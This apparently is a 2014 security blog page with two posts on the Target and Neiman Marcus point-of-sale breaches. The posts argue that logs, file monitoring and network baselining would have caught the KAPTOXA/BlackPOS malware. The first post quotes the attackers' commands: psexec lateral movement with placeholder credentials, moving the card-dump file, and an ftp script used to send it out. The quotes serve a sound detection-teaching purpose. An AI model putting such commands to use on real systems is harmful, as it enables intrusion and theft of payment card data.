Articles & Presentations

Thursday, February 27, 2014

If you can't detect the now infamous KAPTOXA/BlackPOS malware, boy is your InfoSec program in trouble




So we are up to 20 companies affected by the KAPTOXA/BlackPOS malware. The question is did anyone detect this easily detectable event?


"No antivirus software would have stopped the malware that attacked Neiman Marcus’ card-processing network, because it was rewritten to target the company, Kingston said. “It was very specifically designed for an attack on our systems,” he said."

First off, what is wrong with this statement? Mr. Kingston, if you are relying on Anti-Virus to catch an attack such as this APT, your Information Security Program is failing you. AV should never be expected to detect or prevent advanced attacks such as this, it is foolish to think AV would and I have news for you, AV is not designed for this type of threat... Just so you know.

Malware Management anyone?
Kingston also stated that the malware had "sophisticated features making it difficult to detect". Let's look at what we know about the KAPTOXA/BlackPOS malware.

1. We will give up the fact that an endpoint was compromised and it got onto one system. I always say "Give up the Endpoint and detect things from there". Relying on, or telling Congress the malware had a ZERO (0%) detection rate by AV is well, Duh.. All APT has a 0% detection rate. That is what makes it APT and "sophisticated".

2. The malware was a memory only resident program, or was it?  K3wl, it was good malware, as expected and your Security program should be designed for such malware and threats, you know, the stuff that has a 0% detection rate by AV.

3. The malware wrote the encrypted bits to a file located at "C:\Windows\System32\Winxml.dll. OK, any NEW file that is added to \System32 on your static core systems should be reviewed as a part of a 'Malware Management' program. Might I point out this file was NOT a .DLL, rather it was a text file? Can you say look for 'MZ' in files that claim to be executables that are not, and 'MZ' in files with non-executable extensions. TripWire BTW would have detected this file over and over again as it did system checks due to the changes, so would many other security solutions. Nope, AV would not have caught this.

4. The malware ran a script that pushed ' Winxml.dll' to a remote system. Yup, lots of connections to one system from all your POS systems... Really, that is not odd? Windows logs will show this connection, but guessing your IT and InfoSec folks did not configure this, nor were they looking for this condition. Oh yeah.. Cuz you were relying on AV.  Learn what Log Management is all about or SIEM as sales folk like to call it. Got Splunk?

5.  The location and file name for the collection point was "C:\Windows\twain_32".  Why would so many systems write to the Twain_32 directory?  This is used for scanners.  Do you have scanners on your PoS systems?

6. The account used to do all of this was behaving in a way that was probably not normal for this account. So you don't or can't monitor for administrative accounts being used outside their normal operation? No need, we have AV! Again, Log Management and Account Management would be prudent.

7. Might I point out that Windows logs will also capture the process being launched. Both CMD.exe, PSExec and FTP were used in this so called sophisticated attack. These events are captured in Windows logs, but guessing Process execution (EventID 4688 or 592 in XP) was not set to capture 'Success'. Carbon Black and the Windows Logging Service (WLS) agent would have caught this command line activity as well.

c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\<EPOS_IPaddr> -u <username> -p <password> cmd /c “taskkill /im bladelogic.exe /f”
c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\        <EPOS_IPaddr> -u <username> -p <password> -d bladelogic                                         
c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c move \\                              <EPOS_IPaddr>\nt\twain_32a.dll c:\program files\xxxxx\xxxxx\temp\data_2014_1_16_15_30.txt

c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt

8. PSExec installs as a Windows service. Logs also capture when a NEW Service is launched. So let me guess, your folks did not look for EventID 7045 either, or EventID 4697 for XP, a Security 101 item to look for in a good Log Management Program. In the quantities seen with Target and Neiman Marcus, this is really a DUH moment.  Oh wait... maybe the fact that Neiman Marcus missed almost 60,000 alerts is the 'smack your forehead moment'.

"The 59,746 alerts set off by the malware indicated “suspicious behavior” and may have been interpreted as false positives associated with legitimate software. The report, prepared for the retailer by consultancy Protiviti, doesn’t specify why the alerts weren’t investigated."

9. Network traffic, often called NetFlow would have seen odd traffic in a static PoS environment and the SMB (port 445) and FTP traffic would have set off someones spider sense if in fact they were doing what a good InfoSec program does, look for nefarious behavior. Baseline what is normal and detect what is not.

It is clear to me the memory component was sophisticated, it grab credit card numbers and encrypted them on disk; but that is about all that was sophisticated about this malware, oh, and the fact they encrypted the stolen CC numbers is just ironic.

We need to quit chasing Compliance and start doing REAL Security Engineering to detect and catch these types of attacks. All the data I, or many others in our field was present and we would have caught this long before the massive breaches they are.


So Mr. Kingston (Neiman Marcus) and Mr. Mulligan (Target) your Information Security programs, though expensive, do little to stop the real threats facing all of us today.  You might consider hiring InfoSec people who know how to defend and spend less time on Compliance and more on Detection and Response.


#InfoSec #HackerHurricane #KAPTOXA #BlackPOS

Saturday, February 15, 2014

(N) Target warned about risk to PoS due to new Malware months before breach




It is being reported that Target was warned by their Security Staff from reports they received that new malware was targeting PoS systems. Target was in the midst of upgrading their PoS at the time and brushed off the warning. I wonder if the person who blew this warning off still works there?

Article that Target knew of risk

If this is true, and most likely is, then Target Security and/or their Corporate Security Mentality is even more ineffective than we already believe. Business in most corporations accept risk when handed reports of various 'we are vulnerable to XYZ', it's normal business practices of risk acceptance. What InfoSec professionals often can't answer is the question that is always asked..."What is the probability and what would the impact be?". Yeah yeah there are formulas for this, but as we can all guess they would have NEVER calculated out to this amount of loss and cost, or if it was calculated out, management would never believe the numbers or costs. I also think Target InfoSec has no idea how to defend their network or what they needed to actually defend such a malware impact. Maybe they do and maybe they gave 'up yours' management a budget and purchase request, but not likely.

 The Malware Management Framework
The Malware Management Framework

This is why I promote the 'Malware Management Framework'. We no longer have a choice, we MUST manage malware threats just like we manage vulnerabilities. In the case of Target or any other company that was notified of the potential PoS malware, their InfoSec team should have analyzed the data about the malware and potential impact to their own systems and then determined if they could have detected and responded to such an event. If the answer was 'NO', then IT/InfoSec management should have made a statement that was nothing short of "We must address this or the worst WILL happen, if we don't then I/We can no longer work for you". This is where InfoSec must move towards, putting our foot down when such obvious vulnerabilities threaten our companies, or find another job. Face it, if you don't, your probably going to get thrown under the bus anyways.

Every company should do what I call a "Detect and Response Assessment". This type of assessment tests the exact kind of impact that Target was facing. Take a host, assume it is compromised, give us admin credentials and let us see what we can do (non destructive), how far we can get and what we can access. Your goal.. Detect what was done, touched or the behavior I had during the test. This is not a PenTest, this is a faster, cheaper much more effective test of your Detection and Response abilities once a host is compromised, which we all know is inevitable. You WILL get compromised, how fast you detect the compromise needs to be "The New Normal" for InfoSec programs moving forward.

Ask me how, we will discuss it at BSidesAustin 2014.

#InfoSec #HackerHurricane